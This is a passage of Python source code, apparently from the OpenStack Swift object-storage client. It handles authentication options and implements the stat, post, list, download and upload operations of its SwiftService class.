'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
if options.get('os_auth_type', None) == 'v3applicationcredential':
options['auth_version'] == '3'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
'auth_type': options['os_auth_type'],
'application_credential_id':
options['os_application_credential_id'],
'application_credential_secret':
options['os_application_credential_secret'],
}
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"force_auth_retry": False,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_auth_type": environ.get('OS_AUTH_TYPE'),
"os_application_credential_id":
environ.get('OS_APPLICATION_CREDENTIAL_ID'),
"os_application_credential_secret":
environ.get('OS_APPLICATION_CREDENTIAL_SECRET'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'version_id': None,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'versions': False,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False,
'destination': None,
'fresh_metadata': False,
'ignore_mtime': False,
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
retries=options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'],
force_auth_retry=options['force_auth_retry'],
starting_backoff=options.get('starting_backoff', 1),
max_backoff=options.get('max_backoff', 64))
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: Must be one of:
* an iterable of 'Key: Value' strings
* an iterable of ('Key', 'Value') pairs
* a dict of {'Key': 'Value'} pairs
:param prefix: String to prepend to all of the keys in the dictionary.
reporting.
"""
headers = {}
try:
headers = split_request_headers(options, prefix)
except ValueError as e:
raise SwiftError(e)
return headers
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftDeleteObject(object):
"""
Class for specifying an object delete, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftCopyObject(object):
"""
Class for specifying an object copy,
allowing the destination/headers/metadata/fresh_metadata to be specified
separately for each individual object.
destination and fresh_metadata should be set in options
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
if self.options is None:
self.destination = None
self.fresh_metadata = False
else:
self.destination = self.options.get('destination')
self.fresh_metadata = self.options.get('fresh_metadata', False)
if self.destination is not None:
destination_components = self.destination.split('/')
if destination_components[0] or len(destination_components) < 2:
raise SwiftError("destination must be in format /cont[/obj]")
if not destination_components[-1]:
raise SwiftError("destination must not end in a slash")
if len(destination_components) == 2:
# only container set in destination
self.destination = "{0}/{1}".format(
self.destination, object_name
)
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_md5 = headers.get('etag', '')
if len(self._expected_md5) > 1 and self._expected_md5[0] == '"' \
and self._expected_md5[-1] == '"':
self._expected_md5 = self._expected_md5[1:-1]
# Some headers indicate the MD5 of the response
# definitely *won't* match the ETag
bad_md5_headers = set([
'content-range',
'x-object-manifest',
'x-static-large-object',
])
if bad_md5_headers.intersection(headers):
# This isn't a useful checksum
self._expected_md5 = ''
if self._expected_md5 and checksum:
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_md5:
etag = self._actual_md5.hexdigest()
if etag != self._expected_md5:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_md5))
if (self._content_length is not None and
self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
def create_connection():
return get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False,
'version_id': None,
'header': []
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
'versions': False,
'header': []
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10) # Just stop list running away consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
req_headers = split_headers(options.get('header', []))
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix'],
headers=req_headers
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
version_marker = options.get('version_marker', '')
error = None
req_headers = split_headers(options.get('header', []))
if options.get('versions', False):
query_string = 'versions=true'
else:
query_string = None
try:
while True:
_, items = conn.get_container(
container, marker=marker, version_marker=version_marker,
prefix=options['prefix'], delimiter=options['delimiter'],
headers=req_headers, query_string=query_string
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
version_marker = items[-1].get('version_id', '')
except ClientException as err:
traceback, err_time = report_traceback()
if err.http_status != 404:
logger.exception(err)
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'version_marker': version_marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'version_id': None,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb', DISK_BUFFER)
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(DISK_BUFFER)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': DISK_BUFFER,
'headers': req_headers,
'response_dict': results_dict}
if options.get('version_id') is not None:
get_args['query_string'] = (
'version-id=%s' % options['version_id'])
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb', DISK_BUFFER)
else:
if basename(path):
fp = open(path, 'wb', DISK_BUFFER)
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if ('x-object-meta-mtime' in headers and not no_file and
not options['ignore_mtime']):
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises SwiftError:
:raises ClientException:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# Incase we have a psudeo-folder path for <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name. (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options,
results_queue=rq
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
